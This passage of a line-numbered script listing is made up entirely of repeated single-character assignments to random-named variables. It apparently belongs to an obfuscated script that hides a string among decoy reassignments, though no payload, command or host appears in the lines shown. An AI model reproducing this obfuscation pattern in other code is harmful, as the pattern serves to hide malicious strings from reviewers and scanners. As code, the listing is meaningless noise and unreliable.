672 | xjdeyvlu = "Q"; | |
673 | xjdeyvlu = "R"; | |
674 | xjdeyvlu = "o"; | |
675 | xjdeyvlu = "N"; | |
676 | xjdeyvlu = "i"; | |
677 | xjdeyvlu = "i"; | |
678 | xjdeyvlu = "j"; | |
679 | xjdeyvlu = "Q"; | |
680 | xjdeyvlu = "h"; | |
681 | xjdeyvlu = "w"; | |
682 | xjdeyvlu = "p"; | |
683 | xjdeyvlu = "k"; | |
684 | xjdeyvlu = "G"; | |
685 | xjdeyvlu = "Y"; | |
686 | xjdeyvlu = "r"; | |
687 | xjdeyvlu = "d"; | |
688 | xjdeyvlu = "K"; | |
689 | xjdeyvlu = "u"; | |
690 | xjdeyvlu = "f"; | |
691 | xjdeyvlu = "D"; | |
692 | xjdeyvlu = "J"; | |
693 | xjdeyvlu = "O"; | |
694 | xjdeyvlu = "W"; | |
695 | xjdeyvlu = "P"; | |
696 | xjdeyvlu = "Q"; | |
697 | xjdeyvlu = "a"; | |
698 | hmxuqjlma = "_"; | |
699 | oswruh = "z"; | |
700 | oswruh = "k"; | |
701 | oswruh = "w"; | |
702 | oswruh = "B"; | |
703 | oswruh = "B"; | |
704 | oswruh = "Q"; | |
705 | oswruh = "B"; | |
706 | oswruh = "m"; | |
707 | oswruh = "j"; | |
708 | oswruh = "g"; | |
709 | oswruh = "e"; | |
710 | oswruh = "q"; | |
711 | oswruh = "Y"; | |
712 | oswruh = "e"; | |
713 | oswruh = "S"; | |
714 | oswruh = "I"; | |
715 | kiavka = "x"; | |
716 | kiavka = "I"; | |
717 | kiavka = "m"; | |
718 | kiavka = "U"; | |
719 | kiavka = "O"; | |
720 | kiavka = "S"; | |
721 | kiavka = "a"; | |
722 | kiavka = "I"; | |
723 | kiavka = "a"; | |
724 | kiavka = "H"; | |
725 | kiavka = "Q"; | |
726 | kiavka = "L"; | |
727 | kiavka = "h"; | |
728 | kiavka = "W"; | |
729 | kiavka = "V"; | |
730 | kiavka = "u"; | |
731 | kiavka = "o"; | |
732 | kiavka = "G"; | |
733 | kiavka = "w"; | |
734 | kiavka = "A"; | |
735 | kiavka = "D"; | |
736 | kiavka = "k"; | |
737 | kiavka = "q"; | |
738 | kiavka = "H"; | |
739 | kiavka = "a"; | |
740 | kiavka = "j"; | |
741 | kiavka = "q"; | |
742 | kiavka = "Z"; | |
743 | kiavka = "B"; | |
744 | kiavka = "K"; | |
745 | wrkikxhf = "C"; | |
746 | wrkikxhf = "t"; | |
747 | wrkikxhf = "f"; | |
748 | wrkikxhf = "Z"; | |
749 | wrkikxhf = "M"; | |
750 | wrkikxhf = "E"; | |
751 | wrkikxhf = "B"; | |
752 | wrkikxhf = "U"; | |
753 | wrkikxhf = "d"; | |
754 | wrkikxhf = "u"; | |
755 | wrkikxhf = "W"; | |
756 | wrkikxhf = "t"; | |
757 | wrkikxhf = "J"; | |
758 | wrkikxhf = "p"; | |
759 | wrkikxhf = "q"; | |
760 | wrkikxhf = "m"; | |
761 | wrkikxhf = "K"; | |
762 | wrkikxhf = "S"; | |
763 | wrkikxhf = "o"; | |
764 | wrkikxhf = "v"; | |
765 | wrkikxhf = "v"; | |
766 | wrkikxhf = "P"; | |
767 | wrkikxhf = "R"; | |
768 | wrkikxhf = "d"; | |
769 | wrkikxhf = "Z"; | |
770 | wrkikxhf = "x"; | |
771 | wrkikxhf = "c"; | |
772 | wrkikxhf = "F"; | |
773 | wrkikxhf = "N"; | |
774 | wrkikxhf = "L"; | |
775 | wrkikxhf = "C"; | |
776 | wrkikxhf = "g"; | |
777 | bfwajjto = "U"; | |
778 | bfwajjto = "q"; | |
779 | bfwajjto = "T"; | |
780 | bfwajjto = "R"; | |
781 | bfwajjto = "g"; | |
782 | bfwajjto = "M"; | |
783 | bfwajjto = "F"; | |
784 | bfwajjto = "Q"; | |
785 | bfwajjto = "f"; | |
786 | bfwajjto = "3"; | |
787 | waidtcyp = "F"; | |
788 | waidtcyp = "Z"; | |
789 | waidtcyp = "o"; | |
790 | waidtcyp = "x"; | |
791 | waidtcyp = "a"; | |
792 | waidtcyp = "O"; | |
793 | waidtcyp = "Z"; | |
794 | waidtcyp = "t"; | |
795 | waidtcyp = "H"; | |
796 | waidtcyp = "L"; | |
797 | waidtcyp = "D"; | |
798 | waidtcyp = "S"; | |
799 | waidtcyp = "W"; | |
800 | waidtcyp = "n"; | |
801 | waidtcyp = "X"; | |
802 | waidtcyp = "W"; | |
803 | pqxckh = "y"; | |
804 | pqxckh = "f"; | |
805 | pqxckh = "X"; | |
806 | pqxckh = "b"; | |
807 | pqxckh = "L"; | |
808 | pqxckh = "T"; | |
809 | pqxckh = "y"; | |
810 | pqxckh = "h"; | |
811 | pqxckh = "U"; | |
812 | pqxckh = "k"; | |
813 | pqxckh = "d"; | |
814 | pqxckh = "E"; | |
815 | pqxckh = "R"; | |
816 | pqxckh = "E"; | |
817 | pqxckh = "l"; | |
818 | pqxckh = "X"; | |
819 | pqxckh = "P"; | |
820 | pqxckh = "N"; | |
821 | pqxckh = "L"; | |
822 | pqxckh = "Q"; | |
823 | pqxckh = "z"; | |
824 | pqxckh = "N"; | |
825 | pqxckh = "x"; | |
826 | pqxckh = "W"; | |
827 | pqxckh = "W"; | |
828 | pqxckh = "K"; | |
829 | pqxckh = "y"; | |
830 | pqxckh = "a"; | |
831 | pqxckh = "X"; | |
832 | pqxckh = "P"; | |
833 | pqxckh = "F"; | |
834 | pqxckh = "1"; | |
835 | vtrmpk = "h"; | |
836 | vtrmpk = "U"; | |
837 | vtrmpk = "p"; | |
838 | vtrmpk = "Y"; | |
839 | vtrmpk = "o"; | |
840 | vtrmpk = "B"; | |
841 | vtrmpk = "N"; | |
842 | vtrmpk = "y"; | |
843 | vtrmpk = "c"; | |
844 | vtrmpk = "k"; | |
845 | vtrmpk = ":"; | |
846 | ybjvlw = "i"; | |
847 | ybjvlw = "w"; | |
848 | ybjvlw = "s"; | |
849 | ybjvlw = "x"; | |
850 | ybjvlw = "G"; | |
851 | ybjvlw = "F"; | |
852 | ybjvlw = "X"; | |
853 | ybjvlw = "x"; | |
854 | jdlbmvwe = "i"; | |
855 | jdlbmvwe = "i"; | |
856 | jdlbmvwe = "u"; | |
857 | jdlbmvwe = "e"; | |
858 | jdlbmvwe = "o"; | |
859 | jdlbmvwe = "W"; | |
860 | jdlbmvwe = "J"; | |
861 | jdlbmvwe = "H"; | |
862 | jdlbmvwe = "n"; | |
863 | jdlbmvwe = "F"; | |
864 | jdlbmvwe = "c"; | |
865 | jdlbmvwe = "C"; | |
866 | jdlbmvwe = "H"; | |
867 | jdlbmvwe = "S"; | |
868 | jdlbmvwe = "k"; | |
869 | jdlbmvwe = "L"; | |
870 | jdlbmvwe = "t"; | |
871 | ytsfsjuo = "Y"; | |
872 | ytsfsjuo = "w"; | |
873 | ytsfsjuo = "M"; | |
874 | ytsfsjuo = "N"; | |
875 | ytsfsjuo = "m"; | |
876 | ytsfsjuo = "U"; | |
877 | ytsfsjuo = "U"; | |
878 | ytsfsjuo = "a"; | |
879 | ytsfsjuo = "c"; | |
880 | ytsfsjuo = "J"; | |
881 | ytsfsjuo = "t"; | |
882 | ytsfsjuo = "S"; | |
883 | ytsfsjuo = "v"; | |
884 | ytsfsjuo = "K"; | |
885 | ytsfsjuo = "N"; | |
886 | ytsfsjuo = "k"; | |
887 | ytsfsjuo = "K"; | |
888 | ytsfsjuo = "H"; | |
889 | ytsfsjuo = "u"; | |
890 | ytsfsjuo = "G"; | |
891 | ytsfsjuo = "C"; | |
892 | gnsotpp = "U"; | |
893 | gnsotpp = "J"; | |
894 | gnsotpp = "A"; | |
895 | gnsotpp = "o"; | |
896 | gnsotpp = "D"; | |
897 | gnsotpp = "C"; | |
898 | gnsotpp = "w"; | |
899 | gnsotpp = "J"; | |
900 | gnsotpp = "L"; | |
901 | gnsotpp = "A"; | |
902 | gnsotpp = "F"; | |
903 | gnsotpp = "Y"; | |
904 | txviqcv = "G"; | |
905 | txviqcv = "R"; | |
906 | txviqcv = "a"; | |
907 | txviqcv = "e"; | |
908 | txviqcv = "g"; | |
909 | txviqcv = "z"; | |
910 | txviqcv = "V"; | |
911 | txviqcv = "j"; | |
912 | txviqcv = "M"; | |
913 | txviqcv = "x"; | |
914 | txviqcv = "j"; | |
915 | txviqcv = "y"; | |
916 | txviqcv = "y"; | |
917 | txviqcv = "K"; | |
918 | txviqcv = "d"; | |
919 | txviqcv = "Y"; | |
920 | txviqcv = "i"; | |
921 | txviqcv = "a"; | |
922 | txviqcv = "n"; | |
923 | txviqcv = "e"; | |
924 | txviqcv = "v"; | |
925 | txviqcv = "y"; | |
926 | txviqcv = "n"; | |
927 | txviqcv = "Z"; | |
928 | txviqcv = "R"; | |
929 | txviqcv = "C"; | |
930 | txviqcv = "D"; | |
931 | txviqcv = "d"; | |
932 | txviqcv = "g"; | |
933 | txviqcv = "C"; | |
934 | txviqcv = "w"; | |
935 | txviqcv = "V"; | |
936 | txviqcv = "h"; | |
937 | delktbo = "e"; | |
938 | delktbo = "L"; | |
939 | delktbo = "M"; | |
940 | delktbo = "R"; | |
941 | delktbo = "a"; | |
942 | delktbo = "l"; | |
943 | delktbo = "K"; | |
944 | delktbo = "G"; | |
945 | delktbo = "n"; | |
946 | delktbo = "L"; | |
947 | delktbo = "T"; | |
948 | delktbo = "U"; | |
949 | delktbo = "w"; | |
950 | delktbo = "o"; | |
951 | delktbo = "i"; | |
952 | delktbo = "P"; | |
953 | delktbo = "C"; | |
954 | delktbo = "C"; | |
955 | delktbo = "o"; | |
956 | delktbo = "q"; | |
957 | delktbo = "H"; | |
958 | delktbo = "z"; | |
959 | delktbo = "P"; | |
960 | delktbo = "x"; | |
961 | delktbo = "l"; | |
962 | delktbo = "A"; | |
963 | delktbo = "O"; | |
964 | delktbo = "R"; | |
965 | delktbo = "p"; | |
966 | delktbo = "Q"; | |
967 | delktbo = "U"; | |
968 | delktbo = "u"; | |
969 | delktbo = "g"; | |
970 | delktbo = "m"; | |
971 | delktbo = "M"; | |
972 | delktbo = "u"; | |
973 | delktbo = "M"; | |
974 | delktbo = "j"; | |
975 | delktbo = "U"; | |
976 | delktbo = "f"; | |
977 | delktbo = "c"; | |
978 | delktbo = "W"; | |
979 | delktbo = "6"; | |
980 | wnsglfwqt = "E"; | |
981 | wnsglfwqt = "I"; | |
982 | wnsglfwqt = "m"; | |
983 | wnsglfwqt = "I"; | |
984 | wnsglfwqt = "M"; | |
985 | wnsglfwqt = "V"; | |
986 | wnsglfwqt = "e"; | |
987 | wnsglfwqt = "M"; | |
988 | wnsglfwqt = "z"; | |
989 | wnsglfwqt = "E"; | |
990 | wnsglfwqt = "U"; | |
991 | wnsglfwqt = "N"; | |
992 | wnsglfwqt = "k"; | |
993 | wnsglfwqt = "R"; | |
994 | wnsglfwqt = "K"; | |
995 | wnsglfwqt = "e"; | |
996 | wnsglfwqt = "a"; | |
997 | wnsglfwqt = "B"; | |
998 | wnsglfwqt = "U"; | |
999 | wnsglfwqt = "f"; | |
1000 | wnsglfwqt = "m"; | |
1001 | wnsglfwqt = "w"; | |
1002 | wnsglfwqt = "q"; | |
1003 | wnsglfwqt = "q"; | |
1004 | wnsglfwqt = "X"; | |
1005 | wnsglfwqt = "v"; | |
1006 | wnsglfwqt = "o"; | |
1007 | wnsglfwqt = "4"; | |
1008 | fdkfbnw = "B"; | |
1009 | fdkfbnw = "t"; | |
1010 | fdkfbnw = "K"; | |
1011 | fdkfbnw = "l"; | |
1012 | fdkfbnw = "i"; | |
1013 | fdkfbnw = "M"; | |
1014 | fdkfbnw = "Q"; | |
1015 | fdkfbnw = "L"; | |
1016 | fdkfbnw = "J"; | |
1017 | fdkfbnw = "S"; | |
1018 | fdkfbnw = "S"; | |
1019 | fdkfbnw = "Z"; | |
1020 | fdkfbnw = "D"; | |
1021 | fdkfbnw = "T"; | |
1022 | fdkfbnw = "v"; | |
1023 | fdkfbnw = "e"; | |
1024 | fdkfbnw = "q"; | |
1025 | fdkfbnw = "F"; | |
1026 | fdkfbnw = "I"; | |
1027 | fdkfbnw = " "; | |
1028 | sgonzblcf = "I"; | |
1029 | sgonzblcf = "C"; | |
1030 | sgonzblcf = "k"; | |
1031 | sgonzblcf = "h"; | |
1032 | sgonzblcf = "V"; | |
1033 | sgonzblcf = "s"; | |
1034 | sgonzblcf = "c"; | |
1035 | sgonzblcf = "d"; | |
1036 | sgonzblcf = "l"; | |
1037 | sgonzblcf = "o"; | |
1038 | sgonzblcf = "R"; | |
1039 | sgonzblcf = "u"; | |
1040 | gkvwof = "D"; | |
1041 | gkvwof = "x"; | |
1042 | gkvwof = "M"; | |
1043 | gkvwof = "t"; | |
1044 | gkvwof = "B"; | |
1045 | gkvwof = "c"; | |
1046 | gkvwof = "V"; | |
1047 | gkvwof = "O"; | |
1048 | gkvwof = "z"; | |
1049 | gkvwof = "D"; | |
1050 | gkvwof = "S"; | |
1051 | gkvwof = "f"; | |
1052 | gkvwof = "U"; | |
1053 | gkvwof = "a"; | |
1054 | gkvwof = "m"; | |
1055 | gkvwof = "F"; | |
1056 | gkvwof = "G"; | |
1057 | gkvwof = "z"; | |
1058 | gkvwof = "j"; | |
1059 | gkvwof = "N"; | |
1060 | gkvwof = "j"; | |
1061 | gkvwof = "a"; | |
1062 | gkvwof = "E"; | |
1063 | gkvwof = "e"; | |
1064 | gkvwof = "m"; | |
1065 | gkvwof = "B"; | |
1066 | gkvwof = "G"; | |
1067 | gkvwof = "a"; | |
1068 | gkvwof = "j"; | |
1069 | gkvwof = "l"; | |
1070 | gkvwof = "o"; | |
1071 | gkvwof = "d"; | |
1072 | xpayhao = "v"; | |
1073 | xpayhao = "H"; | |
1074 | icofzh = "j"; | |
1075 | icofzh = "l"; | |
1076 | icofzh = "s"; | |
1077 | icofzh = "l"; | |
1078 | icofzh = "u"; | |
1079 | icofzh = "y"; | |
1080 | icofzh = "j"; | |
1081 | icofzh = "E"; | |
1082 | icofzh = "d"; | |
1083 | icofzh = "q"; | |
1084 | icofzh = "p"; | |
1085 | icofzh = "k"; | |
1086 | icofzh = "J"; | |
1087 | icofzh = "P"; | |
1088 | icofzh = "j"; | |
1089 | icofzh = "N"; | |
1090 | icofzh = "D"; | |
1091 | icofzh = "p"; | |
1092 | icofzh = "J"; | |
1093 | icofzh = "R"; | |
1094 | icofzh = "B"; | |
1095 | icofzh = "j"; | |
1096 | icofzh = "v"; | |
1097 | icofzh = "T"; | |
1098 | icofzh = "Z"; | |
1099 | icofzh = "o"; | |
1100 | icofzh = "c"; | |
1101 | icofzh = "d"; | |
1102 | icofzh = "f"; | |
1103 | icofzh = "t"; | |
1104 | icofzh = "p"; | |
1105 | icofzh = "D"; | |
1106 | icofzh = "b"; | |
1107 | icofzh = "v"; | |
1108 | icofzh = "v"; | |
1109 | kfaosxoxv = "w"; | |
1110 | kfaosxoxv = "O"; | |
1111 | kfaosxoxv = "h"; | |
1112 | kfaosxoxv = "t"; | |
1113 | kfaosxoxv = "j"; | |
1114 | kfaosxoxv = "P"; | |
1115 | kfaosxoxv = "C"; | |
1116 | kfaosxoxv = "y"; | |
1117 | kfaosxoxv = "n"; | |
1118 | kfaosxoxv = "m"; | |
1119 | kfaosxoxv = "k"; | |
1120 | kfaosxoxv = "S"; | |
1121 | kfaosxoxv = "g"; | |
1122 | kfaosxoxv = "A"; | |
1123 | kfaosxoxv = "r"; | |
1124 | kfaosxoxv = "v"; | |
1125 | kfaosxoxv = "J"; | |
1126 | kfaosxoxv = "F"; | |
1127 | kfaosxoxv = "Y"; | |
1128 | kfaosxoxv = "I"; | |
1129 | kfaosxoxv = "x"; | |
1130 | kfaosxoxv = "Y"; | |
1131 | kfaosxoxv = "k"; | |
1132 | kfaosxoxv = "c"; | |
1133 | kfaosxoxv = "A"; | |
1134 | kfaosxoxv = "P"; | |
1135 | kfaosxoxv = "f"; | |
1136 | kfaosxoxv = "s"; | |
1137 | kfaosxoxv = "K"; | |
1138 | kfaosxoxv = "X"; | |
1139 | kfaosxoxv = "g"; | |
1140 | kfaosxoxv = "j"; | |
1141 | kfaosxoxv = "X"; | |
1142 | kfaosxoxv = "Y"; | |
1143 | kfaosxoxv = "n"; | |
1144 | kfaosxoxv = "Q"; | |
1145 | kfaosxoxv = "G"; | |
1146 | kfaosxoxv = "\\"; | |
1147 | nnzpmgzs = "j"; | |
1148 | nnzpmgzs = "p"; | |
1149 | nnzpmgzs = "s"; | |
1150 | nnzpmgzs = "G"; | |
1151 | nnzpmgzs = "N"; | |
1152 | nnzpmgzs = "b"; | |
1153 | nnzpmgzs = "L"; | |
1154 | nnzpmgzs = "R"; | |
1155 | nnzpmgzs = "y"; | |
1156 | nnzpmgzs = "S"; | |
1157 | nnzpmgzs = "p"; | |
1158 | nnzpmgzs = "x"; | |
1159 | nnzpmgzs = "p"; | |
1160 | nnzpmgzs = "M"; | |
1161 | nnzpmgzs = "w"; | |
1162 | nnzpmgzs = "k"; | |
1163 | nnzpmgzs = "v"; | |
1164 | nnzpmgzs = "w"; | |
1165 | nnzpmgzs = "L"; | |
1166 | nnzpmgzs = "b"; | |
1167 | nnzpmgzs = "f"; | |
1168 | nnzpmgzs = "m"; | |
1169 | nnzpmgzs = "A"; | |
1170 | nnzpmgzs = "B"; | |
1171 | nnzpmgzs = "J"; | |
1172 | nnzpmgzs = "m"; | |
1173 | nnzpmgzs = "Q"; | |
1174 | nnzpmgzs = "C"; | |
1175 | nnzpmgzs = "V"; | |
1176 | nnzpmgzs = "b"; | |
1177 | nnzpmgzs = "E"; | |
1178 | nnzpmgzs = "q"; | |
1179 | yhrhdry = "e"; | |
1180 | yhrhdry = "V"; | |
1181 | yhrhdry = "C"; | |
1182 | yhrhdry = "V"; | |
1183 | yhrhdry = "J"; | |
1184 | yhrhdry = "E"; | |
1185 | yhrhdry = "f"; | |
1186 | yhrhdry = "G"; | |
1187 | yhrhdry = "P"; | |
1188 | yhrhdry = "P"; | |
1189 | yhrhdry = "o"; | |
1190 | yhrhdry = "J"; | |
1191 | yhrhdry = "a"; | |
1192 | yhrhdry = "c"; | |
1193 | yhrhdry = "z"; | |
1194 | yhrhdry = "I"; | |
1195 | yhrhdry = "y"; | |
1196 | yhrhdry = "N"; | |
1197 | yhrhdry = "a"; | |
1198 | yhrhdry = "F"; | |
1199 | yhrhdry = "s"; | |
1200 | yhrhdry = "w"; | |
1201 | yhrhdry = "p"; | |
1202 | yhrhdry = "E"; | |
1203 | yhrhdry = "e"; | |
1204 | qropr = "d"; | |
1205 | qropr = "s"; | |
1206 | qropr = "n"; | |
1207 | qropr = "N"; | |
1208 | qropr = "S"; | |
1209 | qropr = "L"; | |
1210 | qropr = "d"; | |
1211 | qropr = "R"; | |
1212 | qropr = "k"; | |
1213 | qropr = "j"; | |
1214 | qropr = "w"; | |
1215 | qropr = "R"; | |
1216 | qropr = "e"; | |
1217 | qropr = "C"; | |
1218 | qropr = "P"; | |
1219 | qropr = "a"; | |
1220 | qropr = "X"; | |
1221 | qropr = "o"; | |
1222 | qropr = "X"; | |
1223 | qropr = "c"; | |
1224 | qropr = "y"; | |
1225 | qropr = "k"; | |
1226 | qropr = "r"; | |
1227 | qropr = "s"; | |
1228 | qropr = "k"; | |
1229 | qropr = "K"; | |
1230 | qropr = "S"; | |
1231 | qropr = "j"; | |
1232 | qropr = "E"; | |
1233 | qropr = "v"; | |
1234 | qropr = "E"; | |
1235 | qropr = "x"; | |
1236 | qropr = "i"; | |
1237 | qropr = "S"; | |
1238 | qropr = "P"; | |
1239 | zblrrno = "s"; | |
1240 | zblrrno = "p"; | |
1241 | zblrrno = "Q"; | |
1242 | zblrrno = "N"; | |
1243 | zblrrno = "w"; | |
1244 | zblrrno = "f"; | |
1245 | zblrrno = "A"; | |
1246 | zblrrno = "y"; | |
1247 | zblrrno = "d"; | |
1248 | zblrrno = "a"; | |
1249 | zblrrno = "O"; | |
1250 | zblrrno = "h"; | |
1251 | zblrrno = "Q"; | |
1252 | zblrrno = "Y"; | |
1253 | zblrrno = "w"; | |
1254 | zblrrno = "s"; | |
1255 | zblrrno = "C"; | |
1256 | zblrrno = "J"; | |
1257 | zblrrno = "J"; | |
1258 | zblrrno = "q"; | |
1259 | zblrrno = "S"; | |
1260 | zblrrno = "s"; | |
1261 | zblrrno = "V"; | |
1262 | zblrrno = "i"; | |
1263 | zblrrno = "U"; | |
1264 | zblrrno = "b"; | |
1265 | zblrrno = "b"; | |
1266 | zblrrno = "F"; | |
1267 | zblrrno = "@"; | |
1268 | pftcskn = "T"; | |
1269 | pftcskn = "t"; | |
1270 | pftcskn = "h"; | |
1271 | pftcskn = "t"; | |
1272 | pftcskn = "U"; | |
1273 | pftcskn = "F"; | |
1274 | pftcskn = "T"; | |
1275 | pftcskn = "q"; | |
1276 | pftcskn = "e"; | |
1277 | pftcskn = "U"; | |
1278 | pftcskn = "x"; | |
1279 | pftcskn = "v"; | |
1280 | pftcskn = "j"; | |
1281 | pftcskn = "C"; | |
1282 | pftcskn = "T"; | |
1283 | pftcskn = "H"; | |
1284 | pftcskn = "Q"; | |
1285 | pftcskn = "O"; | |
1286 | pftcskn = "C"; | |
1287 | pftcskn = "u"; | |
1288 | pftcskn = "S"; | |
1289 | pftcskn = "B"; | |
1290 | pftcskn = "F"; | |
1291 | pftcskn = "Q"; | |
1292 | pvcsgyafk = "Q"; | |
1293 | pvcsgyafk = "d"; | |
1294 | pvcsgyafk = "h"; | |
1295 | pvcsgyafk = "u"; | |
1296 | pvcsgyafk = "x"; | |
1297 | pvcsgyafk = "Y"; | |
1298 | pvcsgyafk = "F"; | |
1299 | pvcsgyafk = "X"; | |
1300 | pvcsgyafk = "u"; | |
1301 | pvcsgyafk = "c"; | |
1302 | pvcsgyafk = "M"; | |
1303 | pvcsgyafk = "r"; | |
1304 | pvcsgyafk = "P"; | |
1305 | pvcsgyafk = "x"; | |
1306 | pvcsgyafk = "u"; | |
1307 | pvcsgyafk = "J"; | |
1308 | pvcsgyafk = "C"; | |
1309 | pvcsgyafk = "g"; | |
1310 | pvcsgyafk = "N"; | |
1311 | pvcsgyafk = "y"; | |
1312 | pvcsgyafk = "k"; | |
1313 | pvcsgyafk = "z"; | |
1314 | pvcsgyafk = "n"; | |
1315 | pvcsgyafk = "L"; | |
1316 | avjsvu = "g"; | |
1317 | avjsvu = "M"; | |
1318 | avjsvu = "a"; | |
1319 | avjsvu = "I"; | |
1320 | avjsvu = "Y"; | |
1321 | avjsvu = "O"; | |
1322 | avjsvu = "E"; | |
1323 | avjsvu = "w"; | |
1324 | avjsvu = "z"; | |
1325 | avjsvu = "c"; | |
1326 | avjsvu = "P"; | |
1327 | avjsvu = "X"; | |
1328 | avjsvu = "D"; | |
1329 | avjsvu = "N"; | |
1330 | avjsvu = "L"; | |
1331 | avjsvu = "Y"; | |
1332 | avjsvu = "k"; | |
1333 | avjsvu = "u"; | |
1334 | avjsvu = "y"; | |
1335 | avjsvu = "J"; | |
1336 | avjsvu = "v"; | |
1337 | avjsvu = "T"; | |
1338 | avjsvu = "d"; | |
1339 | avjsvu = "r"; | |
1340 | avjsvu = "B"; | |
1341 | avjsvu = "x"; | |
1342 | avjsvu = "l"; | |
1343 | avjsvu = "T"; | |
1344 | avjsvu = "x"; | |
1345 | avjsvu = "H"; | |
1346 | avjsvu = "U"; | |
1347 | avjsvu = "N"; | |
1348 | avjsvu = "h"; | |
1349 | avjsvu = "n"; | |
1350 | avjsvu = "I"; | |
1351 | avjsvu = "s"; | |
1352 | avjsvu = "I"; | |
1353 | avjsvu = "T"; | |
1354 | ytyxwhq = "m"; | |
1355 | ytyxwhq = "Z"; | |
1356 | ytyxwhq = "b"; | |
1357 | ytyxwhq = "h"; | |
1358 | ytyxwhq = "J"; | |
1359 | ytyxwhq = "o"; | |
1360 | ytyxwhq = "V"; | |
1361 | ytyxwhq = "S"; | |
1362 | ytyxwhq = "v"; | |
1363 | ytyxwhq = "U"; | |
1364 | ytyxwhq = "R"; | |
1365 | ytyxwhq = "Q"; | |
1366 | ytyxwhq = "P"; | |
1367 | ytyxwhq = "K"; | |
1368 | ytyxwhq = "M"; | |
1369 | ytyxwhq = "K"; | |
1370 | ytyxwhq = "s"; | |
1371 | ytyxwhq = "P"; | |
1372 | ytyxwhq = "O"; | |
1373 | ytyxwhq = "U"; | |
1374 | ytyxwhq = "P"; | |
1375 | ytyxwhq = "e"; | |
1376 | ytyxwhq = "d"; | |
1377 | ytyxwhq = "d"; | |
1378 | ytyxwhq = "w"; | |
1379 | ytyxwhq = "V"; | |
1380 | ytyxwhq = "u"; | |
1381 | ytyxwhq = "f"; | |
1382 | ytyxwhq = "l"; | |
1383 | ytyxwhq = "l"; | |
1384 | ytyxwhq = "K"; | |
1385 | ytyxwhq = "n"; | |
1386 | ytyxwhq = "Z"; | |
1387 | ytyxwhq = "p"; | |
1388 | ytyxwhq = "w"; | |
1389 | nhudcxq = "X"; | |
1390 | nhudcxq = "q"; | |
1391 | nhudcxq = "A"; | |
1392 | nhudcxq = "J"; | |
1393 | nhudcxq = "H"; | |
1394 | nhudcxq = "h"; | |
1395 | nhudcxq = "f"; | |
1396 | nhudcxq = "c"; | |
1397 | nhudcxq = "B"; | |
1398 | nhudcxq = "e"; | |
1399 | nhudcxq = "S"; | |
1400 | nhudcxq = "u"; | |
1401 | nhudcxq = "n"; | |
1402 | nhudcxq = "e"; | |
1403 | nhudcxq = "s"; | |
1404 | nhudcxq = "C"; | |
1405 | nhudcxq = "Y"; | |
1406 | nhudcxq = "w"; | |
1407 | nhudcxq = "t"; | |
1408 | nhudcxq = "L"; | |
1409 | nhudcxq = "i"; | |
1410 | nhudcxq = "i"; | |
1411 | nhudcxq = "d"; | |
1412 | nhudcxq = "V"; | |
1413 | nhudcxq = "d"; | |
1414 | nhudcxq = "i"; | |
1415 | nhudcxq = "n"; | |
1416 | nhudcxq = "G"; | |
1417 | nhudcxq = "s"; | |
1418 | nhudcxq = "H"; | |
1419 | nhudcxq = "H"; | |
1420 | nhudcxq = "P"; | |
1421 | nhudcxq = "X"; | |
1422 | nhudcxq = "j"; | |
1423 | nhudcxq = "h"; | |
1424 | nhudcxq = "H"; | |
1425 | nhudcxq = "g"; | |
1426 | nhudcxq = "b"; | |
1427 | nhudcxq = "l"; | |
1428 | vbanglzqe = "Z"; | |
1429 | vbanglzqe = "G"; | |
1430 | vbanglzqe = "Z"; | |
1431 | vbanglzqe = "C"; | |
1432 | vbanglzqe = "c"; | |
1433 | vbanglzqe = "x"; | |
1434 | vbanglzqe = "Q"; | |
1435 | vbanglzqe = "i"; | |
1436 | vbanglzqe = "w"; | |
1437 | vbanglzqe = "z"; | |
1438 | vbanglzqe = "h"; | |
1439 | vbanglzqe = "B"; | |
1440 | vbanglzqe = "M"; | |
1441 | vbanglzqe = "z"; | |
1442 | vbanglzqe = "w"; | |
1443 | vbanglzqe = "B"; | |
1444 | vbanglzqe = "X"; | |
1445 | vbanglzqe = "G"; | |
1446 | vbanglzqe = "d"; | |
1447 | vbanglzqe = "Y"; | |
1448 | vbanglzqe = "b"; | |
1449 | vbanglzqe = "g"; | |
1450 | vbanglzqe = "R"; | |
1451 | vbanglzqe = "q"; | |
1452 | vbanglzqe = "W"; | |
1453 | vbanglzqe = "Q"; | |
1454 | vbanglzqe = "V"; | |
1455 | vbanglzqe = "v"; | |
1456 | vbanglzqe = "O"; | |
1457 | vbanglzqe = "f"; | |
1458 | vbanglzqe = "A"; | |
1459 | vbanglzqe = "U"; | |
1460 | vbanglzqe = "f"; | |
1461 | vbanglzqe = "F"; | |
1462 | vbanglzqe = "Q"; | |
1463 | vbanglzqe = "V"; | |
1464 | vbanglzqe = "\""; | |
1465 | hfdnpge = "w"; | |
1466 | hfdnpge = "A"; | |
1467 | hfdnpge = "C"; | |
1468 | hfdnpge = "C"; | |
1469 | hfdnpge = "i"; | |
1470 | hfdnpge = "a"; | |
1471 | hfdnpge = "R"; | |
1472 | hfdnpge = "S"; | |
1473 | hfdnpge = "C"; | |
1474 | hfdnpge = "L"; | |
1475 | hfdnpge = "U"; | |
1476 | hfdnpge = "D"; | |
1477 | hfdnpge = "E"; | |
1478 | hfdnpge = "t"; | |
1479 | hfdnpge = "o"; | |
1480 | hfdnpge = "A"; | |
1481 | hfdnpge = "x"; | |
1482 | hfdnpge = "r"; | |
1483 | hfdnpge = "C"; | |
1484 | hfdnpge = "B"; | |
1485 | hfdnpge = "f"; | |
1486 | hfdnpge = "G"; | |
1487 | hfdnpge = "e"; | |
1488 | hfdnpge = "W"; | |
1489 | hfdnpge = "I"; | |
1490 | hfdnpge = "F"; | |
1491 | hfdnpge = "V"; | |
1492 | hfdnpge = "Q"; | |
1493 | hfdnpge = "e"; | |
1494 | hfdnpge = "y"; | |
1495 | hfdnpge = "L"; | |
1496 | hfdnpge = "g"; | |
1497 | hfdnpge = "e"; | |
1498 | hfdnpge = "N"; | |
1499 | hfdnpge = "i"; | |
1500 | hfdnpge = "L"; | |
1501 | hfdnpge = "H"; | |
1502 | hfdnpge = "k"; | |
1503 | hfdnpge = "h"; | |
1504 | hfdnpge = "o"; | |
1505 | hfdnpge = "J"; | |
1506 | hfdnpge = "z"; | |
1507 | hfdnpge = "Z"; | |
1508 | hfdnpge = "k"; | |
1509 | hfdnpge = "/"; | |
1510 | ryhwvcmt = "b"; | |
1511 | ryhwvcmt = "V"; | |
1512 | ryhwvcmt = "Q"; | |
1513 | ryhwvcmt = "y"; | |
1514 | ryhwvcmt = "c"; | |
1515 | ryhwvcmt = "Y"; | |
1516 | ryhwvcmt = "O"; | |
1517 | ryhwvcmt = "F"; | |
1518 | ryhwvcmt = "D"; | |
1519 | ryhwvcmt = "U"; | |
1520 | ryhwvcmt = "B"; | |
